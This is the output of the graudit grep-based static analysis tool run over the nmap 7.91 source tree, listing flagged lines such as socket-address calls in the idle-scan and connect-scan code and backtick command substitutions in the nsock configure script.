===========================================================
                                      .___ __  __   
          _________________  __ __  __| _/|__|/  |_ 
         / ___\_` __ \__  \ |  |  \/ __ | | \\_  __\
        / /_/  >  | \// __ \|  |  / /_/ | |  ||  |  
        \___  /|__|  (____  /____/\____ | |__||__|  
       /_____/            \/           \/           
              grep rough audit - static analysis tool
                  v2.8 written by @Wireghoul
=================================[justanotherhacker.com]===
nmap-7.91+dfsg1/nse_nmaplib.cc-181-
nmap-7.91+dfsg1/nse_nmaplib.cc:182:  push_bin_ip(L, currenths->TargetSockAddr());
nmap-7.91+dfsg1/nse_nmaplib.cc-183-  lua_setfield(L, -2, "bin_ip");
nmap-7.91+dfsg1/nse_nmaplib.cc:184:  push_bin_ip(L, currenths->SourceSockAddr());
nmap-7.91+dfsg1/nse_nmaplib.cc-185-  lua_setfield(L, -2, "bin_ip_src");
##############################################
nmap-7.91+dfsg1/idle_scan.cc-239-                        &packetlen);
nmap-7.91+dfsg1/idle_scan.cc:240:      proxy->host.TargetSockAddr(&ss, &sslen);
nmap-7.91+dfsg1/idle_scan.cc-241-      res = send_ip_packet(proxy->rawsd, proxy->ethptr, &ss, ipv6_packet, packetlen);
##############################################
nmap-7.91+dfsg1/idle_scan.cc-396-  /* Make a ping that is in total 1280 byte long and send it */
nmap-7.91+dfsg1/idle_scan.cc:397:  proxy->host.TargetSockAddr(&ss, &sslen);
nmap-7.91+dfsg1/idle_scan.cc-398-  ipv6_packet = build_icmpv6_raw(proxy->host.v6sourceip(), proxy->host.v6hostip(), 0x00, 0x0000, o.ttl, seq , pingid, ICMPV6_ECHO, 0x00, data, sizeof(data) , &packetlen);
##############################################
nmap-7.91+dfsg1/idle_scan.cc-580-  }
nmap-7.91+dfsg1/idle_scan.cc:581:  proxy->host.setTargetSockAddr(&ss, sslen);
nmap-7.91+dfsg1/idle_scan.cc-582-
##############################################
nmap-7.91+dfsg1/idle_scan.cc-584-     the probes */
nmap-7.91+dfsg1/idle_scan.cc:585:  proxy->host.TargetSockAddr(&ss, &sslen);
nmap-7.91+dfsg1/idle_scan.cc-586-  if (!nmap_route_dst(&ss, &rnfo))
##############################################
nmap-7.91+dfsg1/idle_scan.cc-589-  if (o.spoofsource) {
nmap-7.91+dfsg1/idle_scan.cc:590:    o.SourceSockAddr(&ss, &sslen);
nmap-7.91+dfsg1/idle_scan.cc:591:    proxy->host.setSourceSockAddr(&ss, sslen);
nmap-7.91+dfsg1/idle_scan.cc-592-    proxy->host.setDeviceNames(o.device, o.device);
##############################################
nmap-7.91+dfsg1/idle_scan.cc-594-    proxy->host.setDeviceNames(rnfo.ii.devname, rnfo.ii.devfullname);
nmap-7.91+dfsg1/idle_scan.cc:595:    proxy->host.setSourceSockAddr(&rnfo.srcaddr, sizeof(rnfo.srcaddr));
nmap-7.91+dfsg1/idle_scan.cc-596-  }
##############################################
nmap-7.91+dfsg1/idle_scan.cc-1011-
nmap-7.91+dfsg1/idle_scan.cc:1012:  target->TargetSockAddr(&ss, &sslen);
nmap-7.91+dfsg1/idle_scan.cc-1013-  memset(&end, 0, sizeof(end));
##############################################
nmap-7.91+dfsg1/scan_engine_connect.cc-178-
nmap-7.91+dfsg1/scan_engine_connect.cc:179:  if (hss->target->TargetSockAddr(&remote, &remote_len) != 0) {
nmap-7.91+dfsg1/scan_engine_connect.cc-180-    fatal("Failed to get target socket address in %s", __func__);
##############################################
nmap-7.91+dfsg1/scan_engine_connect.cc-339-  if (o.spoofsource && !bind_failed) {
nmap-7.91+dfsg1/scan_engine_connect.cc:340:    o.SourceSockAddr(&ss, &sslen);
nmap-7.91+dfsg1/scan_engine_connect.cc-341-    if (::bind(sd, (struct sockaddr*)&ss, sslen) != 0) {
##############################################
nmap-7.91+dfsg1/scan_engine_connect.cc-387-    set_ipoptions(CP->sd, o.ipoptions, o.ipoptionslen);
nmap-7.91+dfsg1/scan_engine_connect.cc:388:  if (hss->target->TargetSockAddr(&sock, &socklen) != 0) {
nmap-7.91+dfsg1/scan_engine_connect.cc-389-    fatal("Failed to get target socket address in %s", __func__);
##############################################
nmap-7.91+dfsg1/NmapOps.cc-147-
nmap-7.91+dfsg1/NmapOps.cc:148:int NmapOps::SourceSockAddr(struct sockaddr_storage *ss, size_t *ss_len) {
nmap-7.91+dfsg1/NmapOps.cc-149-  if (sourcesocklen <= 0)
##############################################
nmap-7.91+dfsg1/NmapOps.cc-159-/* Returns a const pointer to the source address if set, or NULL if unset. */
nmap-7.91+dfsg1/NmapOps.cc:160:const struct sockaddr_storage *NmapOps::SourceSockAddr() const {
nmap-7.91+dfsg1/NmapOps.cc-161-  if (sourcesock.ss_family == AF_UNSPEC)
##############################################
nmap-7.91+dfsg1/NmapOps.cc-168-     to sockaddr_storage */
nmap-7.91+dfsg1/NmapOps.cc:169:void NmapOps::setSourceSockAddr(struct sockaddr_storage *ss, size_t ss_len) {
nmap-7.91+dfsg1/NmapOps.cc-170-  assert(ss_len > 0 && ss_len <= sizeof(*ss));
##############################################
nmap-7.91+dfsg1/nsock/include/nsock.h-449-/* Sets the local address to bind to before connect() */
nmap-7.91+dfsg1/nsock/include/nsock.h:450:int nsock_iod_set_localaddr(nsock_iod iod, struct sockaddr_storage *ss, size_t sslen);
nmap-7.91+dfsg1/nsock/include/nsock.h-451-
##############################################
nmap-7.91+dfsg1/nsock/tests/run_tests.sh-41-    "-h")
nmap-7.91+dfsg1/nsock/tests/run_tests.sh:42:        echo "Usage: `basename $0` [gdb|trace|leak]"
nmap-7.91+dfsg1/nsock/tests/run_tests.sh-43-        exit 0
##############################################
nmap-7.91+dfsg1/nsock/src/nsock_connect.c-67-
nmap-7.91+dfsg1/nsock/src/nsock_connect.c:68:static int mksock_bind_addr(struct npool *ms, struct niod *iod) {
nmap-7.91+dfsg1/nsock/src/nsock_connect.c-69-  int rc;
##############################################
nmap-7.91+dfsg1/nsock/src/nsock_connect.c-156-  if (iod->locallen)
nmap-7.91+dfsg1/nsock/src/nsock_connect.c:157:    mksock_bind_addr(ms, iod);
nmap-7.91+dfsg1/nsock/src/nsock_connect.c-158-
##############################################
nmap-7.91+dfsg1/nsock/src/nsock_iod.c-385-/* Sets the local address to bind to before connect() */
nmap-7.91+dfsg1/nsock/src/nsock_iod.c:386:int nsock_iod_set_localaddr(nsock_iod iod, struct sockaddr_storage *ss,
nmap-7.91+dfsg1/nsock/src/nsock_iod.c-387-                            size_t sslen) {
##############################################
nmap-7.91+dfsg1/nsock/src/configure-43-if test -z "$BASH_VERSION$ZSH_VERSION" \
nmap-7.91+dfsg1/nsock/src/configure:44:    && (test "X`print -r -- $as_echo`" = "X$as_echo") 2>/dev/null; then
nmap-7.91+dfsg1/nsock/src/configure-45-  as_echo='print -r --'
nmap-7.91+dfsg1/nsock/src/configure-46-  as_echo_n='print -rn --'
nmap-7.91+dfsg1/nsock/src/configure:47:elif (test "X`printf %s $as_echo`" = "X$as_echo") 2>/dev/null; then
nmap-7.91+dfsg1/nsock/src/configure-48-  as_echo='printf %s\n'
##############################################
nmap-7.91+dfsg1/nsock/src/configure-50-else
nmap-7.91+dfsg1/nsock/src/configure:51:  if test "X`(/usr/ucb/echo -n -n $as_echo) 2>/dev/null`" = "X-n $as_echo"; then
nmap-7.91+dfsg1/nsock/src/configure-52-    as_echo_body='eval /usr/ucb/echo -n "$1$as_nl"'
##############################################
nmap-7.91+dfsg1/nsock/src/configure-60-	expr "X$arg" : "X\\(.*\\)$as_nl";
nmap-7.91+dfsg1/nsock/src/configure:61:	arg=`expr "X$arg" : ".*$as_nl\\(.*\\)"`;;
nmap-7.91+dfsg1/nsock/src/configure-62-      esac;
##############################################
nmap-7.91+dfsg1/nsock/src/configure-197-  eval 'test \"x\$as_lineno_1'\$as_run'\" != \"x\$as_lineno_2'\$as_run'\" &&
nmap-7.91+dfsg1/nsock/src/configure:198:  test \"x\`expr \$as_lineno_1'\$as_run' + 1\`\" = \"x\$as_lineno_2'\$as_run'\"' || exit 1
nmap-7.91+dfsg1/nsock/src/configure-199-test \$(( 1 + 1 )) = 2 || exit 1"
##############################################
nmap-7.91+dfsg1/nsock/src/configure-324-      case $as_dir in #(
nmap-7.91+dfsg1/nsock/src/configure:325:      *\'*) as_qdir=`$as_echo "$as_dir" | sed "s/'/'\\\\\\\\''/g"`;; #'(
nmap-7.91+dfsg1/nsock/src/configure-326-      *) as_qdir=$as_dir;;
##############################################
nmap-7.91+dfsg1/nsock/src/configure-397-  {
nmap-7.91+dfsg1/nsock/src/configure:398:    as_val=`expr "$@" || test $? -eq 1`
nmap-7.91+dfsg1/nsock/src/configure-399-  }
##############################################
nmap-7.91+dfsg1/nsock/src/configure-404-# ----------------------------------------
nmap-7.91+dfsg1/nsock/src/configure:405:# Output "`basename $0`: error: ERROR" to stderr. If LINENO and LOG_FD are
nmap-7.91+dfsg1/nsock/src/configure-406-# provided, also output the error to LOG_FD, referencing LINENO. Then exit the
##############################################
nmap-7.91+dfsg1/nsock/src/configure-467-  eval 'test "x$as_lineno_1'$as_run'" != "x$as_lineno_2'$as_run'" &&
nmap-7.91+dfsg1/nsock/src/configure:468:  test "x`expr $as_lineno_1'$as_run' + 1`" = "x$as_lineno_2'$as_run'"' || {
nmap-7.91+dfsg1/nsock/src/configure-469-  # Blame Lee E. McMahon (1931-1989) for sed's syntax.  :-)
##############################################
nmap-7.91+dfsg1/nsock/src/configure-766-  case $ac_option in
nmap-7.91+dfsg1/nsock/src/configure:767:  *=?*) ac_optarg=`expr "X$ac_option" : '[^=]*=\(.*\)'` ;;
nmap-7.91+dfsg1/nsock/src/configure-768-  *=)   ac_optarg= ;;
##############################################
nmap-7.91+dfsg1/nsock/src/configure-810-  -disable-* | --disable-*)
nmap-7.91+dfsg1/nsock/src/configure:811:    ac_useropt=`expr "x$ac_option" : 'x-*disable-\(.*\)'`
nmap-7.91+dfsg1/nsock/src/configure-812-    # Reject names that are not valid shell variable names.
##############################################
nmap-7.91+dfsg1/nsock/src/configure-815-    ac_useropt_orig=$ac_useropt
nmap-7.91+dfsg1/nsock/src/configure:816:    ac_useropt=`$as_echo "$ac_useropt" | sed 's/[-+.]/_/g'`
nmap-7.91+dfsg1/nsock/src/configure-817-    case $ac_user_opts in
##############################################
nmap-7.91+dfsg1/nsock/src/configure-836-  -enable-* | --enable-*)
nmap-7.91+dfsg1/nsock/src/configure:837:    ac_useropt=`expr "x$ac_option" : 'x-*enable-\([^=]*\)'`
nmap-7.91+dfsg1/nsock/src/configure-838-    # Reject names that are not valid shell variable names.
##############################################
nmap-7.91+dfsg1/nsock/src/configure-841-    ac_useropt_orig=$ac_useropt
nmap-7.91+dfsg1/nsock/src/configure:842:    ac_useropt=`$as_echo "$ac_useropt" | sed 's/[-+.]/_/g'`
nmap-7.91+dfsg1/nsock/src/configure-843-    case $ac_user_opts in
##############################################
nmap-7.91+dfsg1/nsock/src/configure-1049-  -with-* | --with-*)
nmap-7.91+dfsg1/nsock/src/configure:1050:    ac_useropt=`expr "x$ac_option" : 'x-*with-\([^=]*\)'`
nmap-7.91+dfsg1/nsock/src/configure-1051-    # Reject names that are not valid shell variable names.
##############################################
nmap-7.91+dfsg1/nsock/src/configure-1054-    ac_useropt_orig=$ac_useropt
nmap-7.91+dfsg1/nsock/src/configure:1055:    ac_useropt=`$as_echo "$ac_useropt" | sed 's/[-+.]/_/g'`
nmap-7.91+dfsg1/nsock/src/configure-1056-    case $ac_user_opts in
##############################################
nmap-7.91+dfsg1/nsock/src/configure-1065-  -without-* | --without-*)
nmap-7.91+dfsg1/nsock/src/configure:1066:    ac_useropt=`expr "x$ac_option" : 'x-*without-\(.*\)'`
nmap-7.91+dfsg1/nsock/src/configure-1067-    # Reject names that are not valid shell variable names.
##############################################
nmap-7.91+dfsg1/nsock/src/configure-1070-    ac_useropt_orig=$ac_useropt
nmap-7.91+dfsg1/nsock/src/configure:1071:    ac_useropt=`$as_echo "$ac_useropt" | sed 's/[-+.]/_/g'`
nmap-7.91+dfsg1/nsock/src/configure-1072-    case $ac_user_opts in
##############################################
nmap-7.91+dfsg1/nsock/src/configure-1103-  *=*)
nmap-7.91+dfsg1/nsock/src/configure:1104:    ac_envvar=`expr "x$ac_option" : 'x\([^=]*\)='`
nmap-7.91+dfsg1/nsock/src/configure-1105-    # Reject names that are not valid shell variable names.
##############################################
nmap-7.91+dfsg1/nsock/src/configure-1124-if test -n "$ac_prev"; then
nmap-7.91+dfsg1/nsock/src/configure:1125:  ac_option=--`echo $ac_prev | sed 's/_/-/g'`
nmap-7.91+dfsg1/nsock/src/configure-1126-  as_fn_error $? "missing argument to $ac_option"
##############################################
nmap-7.91+dfsg1/nsock/src/configure-1146-    */ )
nmap-7.91+dfsg1/nsock/src/configure:1147:      ac_val=`expr "X$ac_val" : 'X\(.*[^/]\)' \| "X$ac_val" : 'X\(.*\)'`
nmap-7.91+dfsg1/nsock/src/configure-1148-      eval $ac_var=\$ac_val;;
##############################################
nmap-7.91+dfsg1/nsock/src/configure-1181-ac_ls_di=`ls -di .` &&
nmap-7.91+dfsg1/nsock/src/configure:1182:ac_pwd_ls_di=`cd "$ac_pwd" && ls -di .` ||
nmap-7.91+dfsg1/nsock/src/configure-1183-  as_fn_error $? "working directory cannot be determined"
##############################################
nmap-7.91+dfsg1/nsock/src/configure-1237-case $srcdir in
nmap-7.91+dfsg1/nsock/src/configure:1238:*/) srcdir=`expr "X$srcdir" : 'X\(.*[^/]\)' \| "X$srcdir" : 'X\(.*\)'`;;
nmap-7.91+dfsg1/nsock/src/configure-1239-esac
##############################################
nmap-7.91+dfsg1/nsock/src/configure-1280-By default, \`make install' will install all the files in
nmap-7.91+dfsg1/nsock/src/configure:1281:\`$ac_default_prefix/bin', \`$ac_default_prefix/lib' etc.  You can specify
nmap-7.91+dfsg1/nsock/src/configure:1282:an installation prefix other than \`$ac_default_prefix' using \`--prefix',
nmap-7.91+dfsg1/nsock/src/configure-1283-for instance \`--prefix=\$HOME'.
##############################################
nmap-7.91+dfsg1/nsock/src/configure-1361-*)
nmap-7.91+dfsg1/nsock/src/configure:1362:  ac_dir_suffix=/`$as_echo "$ac_dir" | sed 's|^\.[\\/]||'`
nmap-7.91+dfsg1/nsock/src/configure-1363-  # A ".." for each directory in $ac_dir_suffix.
nmap-7.91+dfsg1/nsock/src/configure:1364:  ac_top_builddir_sub=`$as_echo "$ac_dir_suffix" | sed 's|/[^\\/]*|/..|g;s|/||'`
nmap-7.91+dfsg1/nsock/src/configure-1365-  case $ac_top_builddir_sub in
##############################################
nmap-7.91+dfsg1/nsock/src/configure-1845-    *\'*)
nmap-7.91+dfsg1/nsock/src/configure:1846:      ac_arg=`$as_echo "$ac_arg" | sed "s/'/'\\\\\\\\''/g"` ;;
nmap-7.91+dfsg1/nsock/src/configure-1847-    esac
##############################################
nmap-7.91+dfsg1/nsock/src/configure-1928-      case $ac_val in
nmap-7.91+dfsg1/nsock/src/configure:1929:      *\'\''*) ac_val=`$as_echo "$ac_val" | sed "s/'\''/'\''\\\\\\\\'\'''\''/g"`;;
nmap-7.91+dfsg1/nsock/src/configure-1930-      esac
##############################################
nmap-7.91+dfsg1/nsock/src/configure-1943-	case $ac_val in
nmap-7.91+dfsg1/nsock/src/configure:1944:	*\'\''*) ac_val=`$as_echo "$ac_val" | sed "s/'\''/'\''\\\\\\\\'\'''\''/g"`;;
nmap-7.91+dfsg1/nsock/src/configure-1945-	esac
##############################################
nmap-7.91+dfsg1/nsock/src/configure-2063-    set,)
nmap-7.91+dfsg1/nsock/src/configure:2064:      { $as_echo "$as_me:${as_lineno-$LINENO}: error: \`$ac_var' was set to \`$ac_old_val' in the previous run" >&5
nmap-7.91+dfsg1/nsock/src/configure:2065:$as_echo "$as_me: error: \`$ac_var' was set to \`$ac_old_val' in the previous run" >&2;}
nmap-7.91+dfsg1/nsock/src/configure-2066-      ac_cache_corrupted=: ;;
##############################################
nmap-7.91+dfsg1/nsock/src/configure-2074-	# differences in whitespace do not lead to failure.
nmap-7.91+dfsg1/nsock/src/configure:2075:	ac_old_val_w=`echo x $ac_old_val`
nmap-7.91+dfsg1/nsock/src/configure:2076:	ac_new_val_w=`echo x $ac_new_val`
nmap-7.91+dfsg1/nsock/src/configure-2077-	if test "$ac_old_val_w" != "$ac_new_val_w"; then
##############################################
nmap-7.91+dfsg1/nsock/src/configure-2094-    case $ac_new_val in
nmap-7.91+dfsg1/nsock/src/configure:2095:    *\'*) ac_arg=$ac_var=`$as_echo "$ac_new_val" | sed "s/'/'\\\\\\\\''/g"` ;;
nmap-7.91+dfsg1/nsock/src/configure-2096-    *) ac_arg=$ac_var=$ac_new_val ;;
##############################################
nmap-7.91+dfsg1/nsock/src/configure-2173-test "x$ac_build_alias" = x &&
nmap-7.91+dfsg1/nsock/src/configure:2174:  ac_build_alias=`$SHELL "$ac_aux_dir/config.guess"`
nmap-7.91+dfsg1/nsock/src/configure-2175-test "x$ac_build_alias" = x &&
nmap-7.91+dfsg1/nsock/src/configure-2176-  as_fn_error $? "cannot guess build type; you must specify one" "$LINENO" 5
nmap-7.91+dfsg1/nsock/src/configure:2177:ac_cv_build=`$SHELL "$ac_aux_dir/config.sub" $ac_build_alias` ||
nmap-7.91+dfsg1/nsock/src/configure-2178-  as_fn_error $? "$SHELL $ac_aux_dir/config.sub $ac_build_alias failed" "$LINENO" 5
##############################################
nmap-7.91+dfsg1/nsock/src/configure-2197-IFS=$ac_save_IFS
nmap-7.91+dfsg1/nsock/src/configure:2198:case $build_os in *\ *) build_os=`echo "$build_os" | sed 's/ /-/g'`;; esac
nmap-7.91+dfsg1/nsock/src/configure-2199-
##############################################
nmap-7.91+dfsg1/nsock/src/configure-2208-else
nmap-7.91+dfsg1/nsock/src/configure:2209:  ac_cv_host=`$SHELL "$ac_aux_dir/config.sub" $host_alias` ||
nmap-7.91+dfsg1/nsock/src/configure-2210-    as_fn_error $? "$SHELL $ac_aux_dir/config.sub $host_alias failed" "$LINENO" 5
##############################################
nmap-7.91+dfsg1/nsock/src/configure-2230-IFS=$ac_save_IFS
nmap-7.91+dfsg1/nsock/src/configure:2231:case $host_os in *\ *) host_os=`echo "$host_os" | sed 's/ /-/g'`;; esac
nmap-7.91+dfsg1/nsock/src/configure-2232-
##############################################
nmap-7.91+dfsg1/nsock/src/configure-2711-$as_echo_n "checking whether the C compiler works... " >&6; }
nmap-7.91+dfsg1/nsock/src/configure:2712:ac_link_default=`$as_echo "$ac_link" | sed 's/ -o *conftest[^ ]*//'`
nmap-7.91+dfsg1/nsock/src/configure-2713-
##############################################
nmap-7.91+dfsg1/nsock/src/configure-2755-	then :; else
nmap-7.91+dfsg1/nsock/src/configure:2756:	   ac_cv_exeext=`expr "$ac_file" : '[^.]*\(\..*\)'`
nmap-7.91+dfsg1/nsock/src/configure-2757-	fi
##############################################
nmap-7.91+dfsg1/nsock/src/configure-2815-    *.$ac_ext | *.xcoff | *.tds | *.d | *.pdb | *.xSYM | *.bb | *.bbg | *.map | *.inf | *.dSYM | *.o | *.obj ) ;;
nmap-7.91+dfsg1/nsock/src/configure:2816:    *.* ) ac_cv_exeext=`expr "$ac_file" : '[^.]*\(\..*\)'`
nmap-7.91+dfsg1/nsock/src/configure-2817-	  break;;
##############################################
nmap-7.91+dfsg1/nsock/src/configure-2924-    *.$ac_ext | *.xcoff | *.tds | *.d | *.pdb | *.xSYM | *.bb | *.bbg | *.map | *.inf | *.dSYM ) ;;
nmap-7.91+dfsg1/nsock/src/configure:2925:    *) ac_cv_objext=`expr "$ac_file" : '.*\.\(.*\)'`
nmap-7.91+dfsg1/nsock/src/configure-2926-       break;;
##############################################
nmap-7.91+dfsg1/nsock/src/configure-3312-  # Check for GNU $ac_path_GREP
nmap-7.91+dfsg1/nsock/src/configure:3313:case `"$ac_path_GREP" --version 2>&1` in
nmap-7.91+dfsg1/nsock/src/configure-3314-*GNU*)
##############################################
nmap-7.91+dfsg1/nsock/src/configure-3378-  # Check for GNU $ac_path_EGREP
nmap-7.91+dfsg1/nsock/src/configure:3379:case `"$ac_path_EGREP" --version 2>&1` in
nmap-7.91+dfsg1/nsock/src/configure-3380-*GNU*)
##############################################
nmap-7.91+dfsg1/nsock/src/configure-3539-do :
nmap-7.91+dfsg1/nsock/src/configure:3540:  as_ac_Header=`$as_echo "ac_cv_header_$ac_header" | $as_tr_sh`
nmap-7.91+dfsg1/nsock/src/configure-3541-ac_fn_c_check_header_compile "$LINENO" "$ac_header" "$as_ac_Header" "$ac_includes_default
##############################################
nmap-7.91+dfsg1/nsock/src/configure-3544-  cat >>confdefs.h <<_ACEOF
nmap-7.91+dfsg1/nsock/src/configure:3545:#define `$as_echo "HAVE_$ac_header" | $as_tr_cpp` 1
nmap-7.91+dfsg1/nsock/src/configure-3546-_ACEOF
##############################################
nmap-7.91+dfsg1/nsock/src/configure-3768-do :
nmap-7.91+dfsg1/nsock/src/configure:3769:  as_ac_var=`$as_echo "ac_cv_func_$ac_func" | $as_tr_sh`
nmap-7.91+dfsg1/nsock/src/configure-3770-ac_fn_c_check_func "$LINENO" "$ac_func" "$as_ac_var"
##############################################
nmap-7.91+dfsg1/nsock/src/configure-3772-  cat >>confdefs.h <<_ACEOF
nmap-7.91+dfsg1/nsock/src/configure:3773:#define `$as_echo "HAVE_$ac_func" | $as_tr_cpp` 1
nmap-7.91+dfsg1/nsock/src/configure-3774-_ACEOF
##############################################
nmap-7.91+dfsg1/nsock/src/configure-4685-do :
nmap-7.91+dfsg1/nsock/src/configure:4686:  as_ac_Header=`$as_echo "ac_cv_header_$ac_header" | $as_tr_sh`
nmap-7.91+dfsg1/nsock/src/configure-4687-ac_fn_c_check_header_mongrel "$LINENO" "$ac_header" "$as_ac_Header" "$ac_includes_default"
##############################################
nmap-7.91+dfsg1/nsock/src/configure-4689-  cat >>confdefs.h <<_ACEOF
nmap-7.91+dfsg1/nsock/src/configure:4690:#define `$as_echo "HAVE_$ac_header" | $as_tr_cpp` 1
nmap-7.91+dfsg1/nsock/src/configure-4691-_ACEOF
##############################################
nmap-7.91+dfsg1/nsock/src/configure-5123-  ac_script='s/\$U\././;s/\.o$//;s/\.obj$//'
nmap-7.91+dfsg1/nsock/src/configure:5124:  ac_i=`$as_echo "$ac_i" | sed "$ac_script"`
nmap-7.91+dfsg1/nsock/src/configure-5125-  # 2. Prepend LIBOBJDIR.  When used with automake>=1.10 LIBOBJDIR
##############################################
nmap-7.91+dfsg1/nsock/src/configure-5190-if test -z "$BASH_VERSION$ZSH_VERSION" \
nmap-7.91+dfsg1/nsock/src/configure:5191:    && (test "X`print -r -- $as_echo`" = "X$as_echo") 2>/dev/null; then
nmap-7.91+dfsg1/nsock/src/configure-5192-  as_echo='print -r --'
nmap-7.91+dfsg1/nsock/src/configure-5193-  as_echo_n='print -rn --'
nmap-7.91+dfsg1/nsock/src/configure:5194:elif (test "X`printf %s $as_echo`" = "X$as_echo") 2>/dev/null; then
nmap-7.91+dfsg1/nsock/src/configure-5195-  as_echo='printf %s\n'
##############################################
nmap-7.91+dfsg1/nsock/src/configure-5197-else
nmap-7.91+dfsg1/nsock/src/configure:5198:  if test "X`(/usr/ucb/echo -n -n $as_echo) 2>/dev/null`" = "X-n $as_echo"; then
nmap-7.91+dfsg1/nsock/src/configure-5199-    as_echo_body='eval /usr/ucb/echo -n "$1$as_nl"'
##############################################
nmap-7.91+dfsg1/nsock/src/configure-5207-	expr "X$arg" : "X\\(.*\\)$as_nl";
nmap-7.91+dfsg1/nsock/src/configure:5208:	arg=`expr "X$arg" : ".*$as_nl\\(.*\\)"`;;
nmap-7.91+dfsg1/nsock/src/configure-5209-      esac;
##############################################
nmap-7.91+dfsg1/nsock/src/configure-5284-# ----------------------------------------
nmap-7.91+dfsg1/nsock/src/configure:5285:# Output "`basename $0`: error: ERROR" to stderr. If LINENO and LOG_FD are
nmap-7.91+dfsg1/nsock/src/configure-5286-# provided, also output the error to LOG_FD, referencing LINENO. Then exit the
##############################################
nmap-7.91+dfsg1/nsock/src/configure-5356-  {
nmap-7.91+dfsg1/nsock/src/configure:5357:    as_val=`expr "$@" || test $? -eq 1`
nmap-7.91+dfsg1/nsock/src/configure-5358-  }
##############################################
nmap-7.91+dfsg1/nsock/src/configure-5460-      case $as_dir in #(
nmap-7.91+dfsg1/nsock/src/configure:5461:      *\'*) as_qdir=`$as_echo "$as_dir" | sed "s/'/'\\\\\\\\''/g"`;; #'(
nmap-7.91+dfsg1/nsock/src/configure-5462-      *) as_qdir=$as_dir;;
##############################################
nmap-7.91+dfsg1/nsock/src/configure-5591-cat >>$CONFIG_STATUS <<_ACEOF || ac_write_fail=1
nmap-7.91+dfsg1/nsock/src/configure:5592:ac_cs_config="`$as_echo "$ac_configure_args" | sed 's/^ //; s/[\\""\`\$]/\\\\&/g'`"
nmap-7.91+dfsg1/nsock/src/configure-5593-ac_cs_version="\\
##############################################
nmap-7.91+dfsg1/nsock/src/configure-5613-  --*=?*)
nmap-7.91+dfsg1/nsock/src/configure:5614:    ac_option=`expr "X$1" : 'X\([^=]*\)='`
nmap-7.91+dfsg1/nsock/src/configure:5615:    ac_optarg=`expr "X$1" : 'X[^=]*=\(.*\)'`
nmap-7.91+dfsg1/nsock/src/configure-5616-    ac_shift=:
##############################################
nmap-7.91+dfsg1/nsock/src/configure-5618-  --*=)
nmap-7.91+dfsg1/nsock/src/configure:5619:    ac_option=`expr "X$1" : 'X\([^=]*\)='`
nmap-7.91+dfsg1/nsock/src/configure-5620-    ac_optarg=
##############################################
nmap-7.91+dfsg1/nsock/src/configure-5642-    case $ac_optarg in
nmap-7.91+dfsg1/nsock/src/configure:5643:    *\'*) ac_optarg=`$as_echo "$ac_optarg" | sed "s/'/'\\\\\\\\''/g"` ;;
nmap-7.91+dfsg1/nsock/src/configure-5644-    '') as_fn_error $? "missing file argument" ;;
##############################################
nmap-7.91+dfsg1/nsock/src/configure-5650-    case $ac_optarg in
nmap-7.91+dfsg1/nsock/src/configure:5651:    *\'*) ac_optarg=`$as_echo "$ac_optarg" | sed "s/'/'\\\\\\\\''/g"` ;;
nmap-7.91+dfsg1/nsock/src/configure-5652-    esac
##############################################
nmap-7.91+dfsg1/nsock/src/configure-5772-fi
nmap-7.91+dfsg1/nsock/src/configure:5773:ac_cs_awk_cr=`$AWK 'BEGIN { print "a\rb" }' </dev/null 2>/dev/null`
nmap-7.91+dfsg1/nsock/src/configure-5774-if test "$ac_cs_awk_cr" = "a${ac_cr}b"; then
##############################################
nmap-7.91+dfsg1/nsock/src/configure-5789-  as_fn_error $? "could not make $CONFIG_STATUS" "$LINENO" 5
nmap-7.91+dfsg1/nsock/src/configure:5790:ac_delim_num=`echo "$ac_subst_vars" | grep -c '^'`
nmap-7.91+dfsg1/nsock/src/configure-5791-ac_delim='%!_!# '
##############################################
nmap-7.91+dfsg1/nsock/src/configure-5795-
nmap-7.91+dfsg1/nsock/src/configure:5796:  ac_delim_n=`sed -n "s/.*$ac_delim\$/X/p" conf$$subs.awk | grep -c X`
nmap-7.91+dfsg1/nsock/src/configure-5797-  if test $ac_delim_n = $ac_delim_num; then
##############################################
nmap-7.91+dfsg1/nsock/src/configure-5933-for ac_last_try in false false :; do
nmap-7.91+dfsg1/nsock/src/configure:5934:  ac_tt=`sed -n "/$ac_delim/p" confdefs.h`
nmap-7.91+dfsg1/nsock/src/configure-5935-  if test -z "$ac_tt"; then
##############################################
nmap-7.91+dfsg1/nsock/src/configure-6065-      esac
nmap-7.91+dfsg1/nsock/src/configure:6066:      case $ac_f in *\'*) ac_f=`$as_echo "$ac_f" | sed "s/'/'\\\\\\\\''/g"`;; esac
nmap-7.91+dfsg1/nsock/src/configure-6067-      as_fn_append ac_file_inputs " '$ac_f'"
##############################################
nmap-7.91+dfsg1/nsock/src/configure-6124-*)
nmap-7.91+dfsg1/nsock/src/configure:6125:  ac_dir_suffix=/`$as_echo "$ac_dir" | sed 's|^\.[\\/]||'`
nmap-7.91+dfsg1/nsock/src/configure-6126-  # A ".." for each directory in $ac_dir_suffix.
nmap-7.91+dfsg1/nsock/src/configure:6127:  ac_top_builddir_sub=`$as_echo "$ac_dir_suffix" | sed 's|/[^\\/]*|/..|g;s|/||'`
nmap-7.91+dfsg1/nsock/src/configure-6128-  case $ac_top_builddir_sub in
##############################################
nmap-7.91+dfsg1/nsock/src/configure-6176-/@mandir@/p'
nmap-7.91+dfsg1/nsock/src/configure:6177:case `eval "sed -n \"\$ac_sed_dataroot\" $ac_file_inputs"` in
nmap-7.91+dfsg1/nsock/src/configure-6178-*datarootdir*) ac_datarootdir_seen=yes;;
##############################################
nmap-7.91+dfsg1/nsock/src/configure-6193-
nmap-7.91+dfsg1/nsock/src/configure:6194:# Neutralize VPATH when `$srcdir' = `.'.
nmap-7.91+dfsg1/nsock/src/configure-6195-# Shell code in configure.ac might set extrasub.
##############################################
nmap-7.91+dfsg1/nsock/src/configure-6219-test -z "$ac_datarootdir_hack$ac_datarootdir_seen" &&
nmap-7.91+dfsg1/nsock/src/configure:6220:  { ac_out=`sed -n '/\${datarootdir}/p' "$ac_tmp/out"`; test -n "$ac_out"; } &&
nmap-7.91+dfsg1/nsock/src/configure-6221-  { ac_out=`sed -n '/^[	 ]*datarootdir[	 ]*:*=/p' \
##############################################
nmap-7.91+dfsg1/nmap-services-11285-vsi-omega	7566/udp	0.000000	# VSI Omega
nmap-7.91+dfsg1/nmap-services:11286:dell-eql-asm	7569/tcp	0.000000	# Dell EqualLogic Host Group Management
nmap-7.91+dfsg1/nmap-services-11287-aries-kfinder	7570/tcp	0.000000	# Aries Kfinder
##############################################
nmap-7.91+dfsg1/osscan2.cc-834-
nmap-7.91+dfsg1/osscan2.cc:835:    if (islocalhost(hsi->target->TargetSockAddr())) {
